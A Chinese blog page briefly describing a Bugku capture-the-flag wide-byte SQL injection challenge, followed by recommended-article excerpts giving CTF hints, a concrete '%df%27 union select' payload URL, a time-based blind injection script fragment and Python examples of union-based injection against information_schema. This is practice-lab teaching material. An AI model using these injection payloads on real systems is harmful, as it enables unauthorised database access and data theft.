BUGKU_WEB_SQL测试

最新推荐文章于 2022-06-01 16:39:10 发布
原创 最新推荐文章于 2022-06-01 16:39:10 发布 · 272 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文通过一次成功的宽字节注入案例展示了如何利用特殊字符进行数据库信息提取的过程。案例中,通过尝试宽字节注入的方式成功触发错误并进一步获取到了目标数据库的内容,最终找到了flag。

加上'后仍然显示正常,应该是‘被转义了,遂尝试宽字节注入,成功报错

接着就可以提取数据库了

flag应该就在sql5这个数据库里了

 

得到flag

bugku web 系列题目思路总结(一)
yukinorong的博客
07-31 2408
bugku web 系列题目,仅作为自身答题积累,包含题目关键步骤,并没有包含答案,只包含前三分之一。 希望自己能坚持刷下去。加油。 bugku post 可利用脚本为链接传输post数据 import requests s = requests.Session() r = s.get("http://123.206.87.240:8002/post/") values = {'what':'f...
bugku web 系列题目思路总结(五)
yukinorong的博客
08-09 550
bugku insert into 注入 PHP explode() 将字符串打散为数组。根据第一个参数分割。 一个基于时间的盲注代码。 # -*- coding:utf-8 -*- import requests import sys # 基于时间的盲注,过滤了逗号 , sql = "127.0.0.1'+(select case when substr((select flag from fl...
Bugkuweb题(三)
weixin_43342135的博客
08-14 406
17.输入密码查看flag 查看网站,得到提示baopo的提示,于是这里采取了burpsuite抓包进行密码爆破: 最后burpsuite,爆破出密码:13579 得到了flag: 18.点击一百万次 点击查看网站,然后观察网页源码,发现了post传值的可能。 然后我们传值给clicks变量,传1000000给clicks变量,得到flag 19.备份是个好习惯 ...
Bugku web基础题(get 、post)
wssmiss的博客
03-01 1600
web基础get: web基础post: burp抓包,改包,报头改为POST,结尾加上参数what=flag 矛盾: 不是数字则输出,进入下一个if判断,是1才输出flag。利用php的特点,输入1a,1b,1c 。。。 再判断是否为数字时,不是数字,与1比较时 是 1 域名解析: 首先在终端需要管理员权限 进入/etc/hosts 修改映射 打开浏览器拿flag 你必须让他停下: 查...
Bugkuweb练习题(一)
weixin_43342135的博客
07-19 886
一.web2 1.先打开网站,然后发现网页一片空白,查看源代码后,得到flag,然后提交。 二.计算器 1.然后打开网站后,发现是个输入验证码的事,但是输入的时候,发现了验证码的输入框的长度只有一个数字的长度,然后用控制台打开将maxlength参数修改。 将此处的1修改成2,后更新网页,输入正确的答案,得到flag: 三.web基础$_GET 1.打开网页后,发现提示: 2.用harba...
Bugku Web CTF-sql注入2
No Title
01-14 825
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
BUGKU--web详解
qq_49422880的博客
05-28 2265
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
bugku web题集锦
skysys的研究小屋
06-01 1593
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
bugkuweb38 基于布尔的SQL盲注
EC_Carrot的博客
12-25 891
题目 进去后是一个登陆界面,照常用admin登陆随便一个密码,发现说password error,在admin加上个'提示username does not exist!,再加上题目提示基于布尔的SQL盲注,猜测后端是判断username是否存在,这里可能就会有注入点。输入了and发现提示illegal character,说明有过滤。 先FUZZ测试一下发现and、+、=等许多东西都给过滤了,但是^、ascii、substr等用于盲注的函数都还在,主要的空格可以用()绕过,=可以用<>来代替
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3626
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
CTF学习之路---bugku WEB篇-WEB2(更新中)
踏坑的小白
01-03 1590
1.WEB2 题目链接 http://123.206.87.240:8002/web2/ 第一题为签到题,页面挺好玩,主要进入有一组滑稽笑脸 使用F12查看源代码即可找到flag值 签到题没什么好说的 ...
BugKu Web进阶
AlexYoung28的博客
08-25 2214
哇,总算做到进阶题目来了,希望我这个菜鸡还可以多做几道题吧!加油 phpcmsV9 看到这个题目,看起来是一个已经存在的漏洞,赶快搜一搜,结果,还真有这个漏洞,然后大致看了一下。 但是这个网页是不是太简陋了,感觉没有什么注入点呀。 好吧,还是 扫描器扫一扫。 结果发现了 robots.txt, 看一下,结果就没有结果了。 当然,这里好像是因为这道题靶机被人破坏了吧,我进入这道题的主页...
bugku web题总结
h0ryit的博客
06-12 1733
陆陆续续将bugkuweb题刷了一大半,剩下的都是分比较高的难点的题,做题过程中遇到了很多的问题,大部分题就没离开过write up,不过还是学到了很多,因此想做一个总结。 线索收集 拿到一个ctf题的第一步就是收集信息,特别是一些隐藏的提示信息,否则会寸步难行。 常见的信息点 网页文档的DOM信息 网页注释 有些题会在网页注释中给出提示信息,比如给出一部分源码之类的...
Bugku-Web题wp (前九题)
Risker
03-14 1130
分享一下本人做题记录,不足之处多多指正。这里先贴一波之前的做题记录,还在更新中(补之前的wp)签到题:直接加入qq群,公告里就有key: Web2:打开发现都是滑稽,查看源代码就可以找到key了: 文件上传:上传php文件,显示不是图片,上传图片,又必须是php,显然普通上传不能同时满足这两个条件,所以上传个图片用burp抓包,发送到repeater:观察到有个filename=”****.png...
bugku web方向所有题解
kekefen01的博客
04-18 3521
第一题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空一行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类型 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
bugku web ctf 练习
天跃
08-25 895
1.web2 看到这个滑稽的笑脸直接F12查看一下源码, 就发现了flag &lt;!--flag KEY{Web-2-bugKssNNikls9100}--&gt; 2.计算器 嗯,直接输入答案,好像不行,只能输入一位,查看源码,看能不能改输入的长度, 只需将maxlength的值改为答案的位数就可以。 flag{CTF-bugku-0032}   ...
Bugku Web题刷题记录(会持续更新)
s1054436218的博客
03-28 6157
之前web题做的不太多,现在多刷一点,写一下writeup记录一下,也方便以后复习。sql注入宽字符注入,题目说找key表的string字段了,so payload如下:http://103.238.227.13:10083/?id=1%df%27unionselect string,1 from sql5.key%23域名解析这道题写wp的时候打不开了,不过当时做的时候只要把host改成这个ip...
Lua非空判断方法[源码]
11-24
本文详细介绍了在Lua中进行非空判断的几种方法,特别是针对table类型的变量。首先,文章指出了直接对nil值进行索引会导致异常的问题,并给出了一个简单的例子来说明如何避免这种情况。接着,文章讨论了如何判断一个table是否为空,指出不能简单地使用`#table == 0`的方式,而是应该使用`next(t) == nil`的方法。此外,文章还提到了`next`指令在LuaJIT中的优化问题,建议在非必要情况下少用。最后,文章简要介绍了如何判断一个字符串是否全部由空格组成,使用了正则匹配的方法。这些内容对于Lua开发者来说非常实用,能够帮助他们避免常见的错误。
JS表格转Excel实现[可运行源码]
最新发布
11-24
该文章详细介绍了如何使用JavaScript将HTML表格数据导出为Excel文件。内容涵盖了针对不同浏览器的兼容性处理,包括IE和非IE浏览器的不同实现方式。对于IE浏览器,使用ActiveXObject进行导出;对于非IE浏览器,则通过base64编码和数据URI方案实现。文章还提供了完整的代码示例,包括表格数据的处理、格式化和导出功能,支持文本和图片类型的数据导出。
bugku just_sqli
09-20
由于没有具体的参考引用内容,以下是关于Bugku平台just_sqli题目的一般分析与推测。 ### 题目详情推测 通常在Bugku这类CTF平台中,just_sqli题目往往是围绕SQL注入漏洞展开。题目可能会给出一个简单的Web页面,页面上有输入框用于接收用户输入,可能用于查询数据库中的某些信息,例如用户信息、文章列表等。页面可能会根据输入的内容动态生成SQL查询语句并执行,而由于开发过程中没有对用户输入进行严格的过滤和转义,就导致了SQL注入漏洞的产生。 ### 解题思路 1. **判断注入点**: - 可以尝试在输入框中输入一些简单的特殊字符,如单引号 `'`、双引号 `"`、括号 `()` 等,观察页面返回的错误信息。如果输入单引号后页面出现数据库错误提示,那么很可能存在SQL注入漏洞,且注入点在单引号闭合处。 - 也可以使用 `and 1=1` 和 `and 1=2` 这样的语句来判断是否存在布尔盲注。如果输入 `and 1=1` 时页面正常显示,输入 `and 1=2` 时页面显示异常(如无结果返回等),则说明存在布尔盲注。 ```python # 示例代码,模拟布尔盲注测试 import requests url = 'http://example.com/just_sqli.php' payload_true = {'input': 'value and 1=1'} payload_false = {'input': 'value and 1=2'} response_true = requests.get(url, params=payload_true) response_false = requests.get(url, params=payload_false) if len(response_true.text) != len(response_false.text): print("可能存在布尔盲注漏洞") ``` 2. **确定数据库类型**: - 通过注入不同数据库特有的函数来判断数据库类型。例如,对于MySQL可以使用 `version()` 函数,对于SQL Server可以使用 `@@version`。 ```python # 示例代码,检测MySQL数据库版本 import requests url = 'http://example.com/just_sqli.php' payload = {'input': "value' union select version() -- "} response = requests.get(url, params=payload) print(response.text) ``` 3. **获取数据库信息**: - 利用注入漏洞获取数据库名、表名、列名等信息。在MySQL中,可以使用 `information_schema` 数据库来获取这些信息。 ```python # 示例代码,获取数据库中的表名 import requests url = 'http://example.com/just_sqli.php' payload = {'input': "value' union select table_name from information_schema.tables where table_schema=database() -- "} response = requests.get(url, params=payload) print(response.text) ``` 4. **获取数据内容**: - 当获取到表名和列名后,就可以获取具体的数据内容。 ```python # 示例代码,获取指定表中的数据 import requests url = 'http://example.com/just_sqli.php' table_name = 'users' column_name = 'username' payload = {'input': f"value' union select {column_name} from {table_name} -- "} response = requests.get(url, params=payload) print(response.text) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值